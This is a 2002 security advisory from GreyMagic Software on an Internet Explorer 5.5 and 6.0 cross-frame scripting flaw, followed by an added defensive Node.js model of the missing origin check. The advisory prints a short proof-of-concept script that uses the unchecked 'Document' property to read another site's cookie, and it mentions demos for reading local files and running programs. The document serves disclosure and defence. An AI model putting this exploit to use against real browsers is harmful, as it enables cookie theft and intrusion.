
gm011-ie.txt

17 Oct 2002. Reported by GreyMagic Software. Source: packetstorm (packetstormsecurity.com).

Security flaw in Internet Explorer 5.5 and 6.0 allows cross-frame scripting: a script on one page can read the DOM of a framed page from another domain.

Code
`GreyMagic Security Advisory GM#011-IE  
=====================================  
  
By GreyMagic Software, Israel.  
15 Oct 2002.  
  
Available in HTML format at http://security.greymagic.com/adv/gm011-ie/.  
  
Topic: Internet Explorer : The D-Day.  
  
Discovery date: 26 Sep 2002.  
  
Affected applications:  
======================  
  
Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not  
vulnerable.  
  
Note that any other application that uses Internet Explorer's engine  
(WebBrowser control) is affected as well (Outlook under the Internet zone,  
MSN Explorer, etc.).  
  
  
Introduction:  
=============  
  
The <frame> and <iframe> elements may contain URLs in other domains or  
protocols, and therefore have strict security rules, which prevent frames in  
one domain from accessing content and information in another. Microsoft explains  
the issue in this Cross-Frame Scripting article -  
http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp.  
  
There are several ways to refer to an <iframe>'s (or <frame>) document in  
Internet Explorer (assuming <iframe id="oFrameId">):  
  
* oFrameId.document  
* document.all.oFrameId.contentWindow.document  
* frames.oFrameId.document  
* And others.  
  
All these methods are handled correctly by Internet Explorer and prevent any  
attempt to access a document that originates from a foreign domain.  
  
  
Discussion:  
===========  
  
The <iframe> and <frame> elements are really instances of the WebBrowser  
control supplied by Microsoft. The WebBrowser control exposes several  
potentially dangerous properties by default, which Microsoft overrides in  
Internet Explorer.  
  
However, Microsoft missed out on one important property -- "Document", with  
a capital "D".  
  
Normally, using "oElement.document" would provide a reference to the  
document that owns the current element. The same applies to the <frame> and  
<iframe> elements. However, we discovered that when  
"oIFrameElement.Document" is used, the returned document is the one  
contained inside the frame, and there are no security restrictions in place  
to check if it's in a different domain.  
  
This provides free and full access to the frame's Document Object Model,  
which allows an attacker to steal cookies from any site, gain access to  
content in sites (forging content), read local files and execute arbitrary  
programs on the client's machine (script in the "My Computer" zone).  
  
Both Internet Explorer 5.5 SP2 and Internet Explorer 6 are vulnerable, but  
surprisingly this vulnerability does not exist in IE6 SP1. It's hard to  
believe that Microsoft actually meant to plug it as IE5.5 remains  
vulnerable, yet somehow this stray property is now protected.  
  
  
Exploit:  
========  
  
This exploit demonstrates how an attacker may choose to read the client's  
"google.com" cookie.  
  
<script language="jscript">  
onload=function () {  
    // Timer necessary to prevent weird behavior in some conditions  
    setTimeout(  
        function () {  
            // "Document" (capital D) bypasses the cross-frame check that "document" enforces  
            alert(document.getElementById("oVictim").Document.cookie);  
        },  
        100  
    );  
}  
</script>  
<iframe src="http://google.com" id="oVictim"></iframe>  
  
  
Solution:  
=========  
  
Until a patch becomes available either disable Active Scripting or upgrade  
to IE6 SP1.  
  
  
Tested on:  
==========  
  
IE5.5 Win98.  
IE5.5 NT4.  
IE6 Win98.  
IE6 Win2000.  
IE6 WinXP.  
  
  
Demonstration:  
==============  
  
We put together four proof-of-concept demonstrations:  
  
* Simple: Reads the client's "google.com" cookie.  
* D-Day Console: Automatically load and execute commands on any site.  
* D-Day Reading: Read local files by accessing a res:// URL.  
* D-Day Execution: Execute arbitrary programs by accessing a res:// URL.  
  
They can all be found at http://security.greymagic.com/adv/gm011-ie/.  
  
  
Feedback:  
=========  
  
Please mail any questions or comments to [email protected].  
  
- Copyright © 2002 GreyMagic Software.  
  
`
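The Discussion section above describes a cross-frame check that Internet Explorer applied on one accessor ("document") but not on its alias ("Document"). The following is an added example, not code from the advisory or from Internet Explorer: a small Node.js model of that inconsistency beside the fixed form, in which every accessor goes through one origin comparison. The names parseOrigin, sameOrigin, makeFrame and probe are hypothetical, and the cookie value is constructed.

```javascript
// Added example, not from the advisory: model of an alias accessor that
// skips the cross-frame origin check, beside the fixed version.

// Reduce a URL to the (scheme, host, port) triple that cross-frame
// scripting compares; default ports are filled in so that
// "http://a.example" and "http://a.example:80" count as the same origin.
function parseOrigin(url) {
  const u = new URL(url);
  const defaults = { "http:": "80", "https:": "443" };
  return { scheme: u.protocol, host: u.hostname, port: u.port || defaults[u.protocol] || "" };
}

function sameOrigin(a, b) {
  const x = parseOrigin(a), y = parseOrigin(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// Hypothetical frame model: a page at parentUrl embeds a document
// (innerDoc) loaded from frameUrl. "patched" selects whether the
// alias accessor shares the guard or bypasses it, as in GM#011-IE.
function makeFrame(parentUrl, frameUrl, innerDoc, patched) {
  const guarded = () => {
    if (!sameOrigin(parentUrl, frameUrl)) throw new Error("Access is denied.");
    return innerDoc;
  };
  return {
    // The accessor the browser did check.
    get document() { return guarded(); },
    // The alias the advisory reports: unchecked when unpatched,
    // routed through the same guard when patched.
    get Document() { return patched ? guarded() : innerDoc; },
  };
}

// Read the framed document's cookie through a given accessor name,
// reporting "denied" when the guard fires.
function probe(frame, accessor) {
  try { return frame[accessor].cookie; } catch (e) { return "denied"; }
}

// Constructed sample: a third-party page framing a site that set a cookie.
const victimDoc = { cookie: "PREF=constructed-sample-value" };
const vulnerable = makeFrame("http://third-party.example/", "http://google.com/", victimDoc, false);
const patchedFrame = makeFrame("http://third-party.example/", "http://google.com/", victimDoc, true);
```

The lesson for reviewers of any origin-checking code is the same one the advisory makes: a security check must sit on the shared path to the protected object, not on one of several names that reach it.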
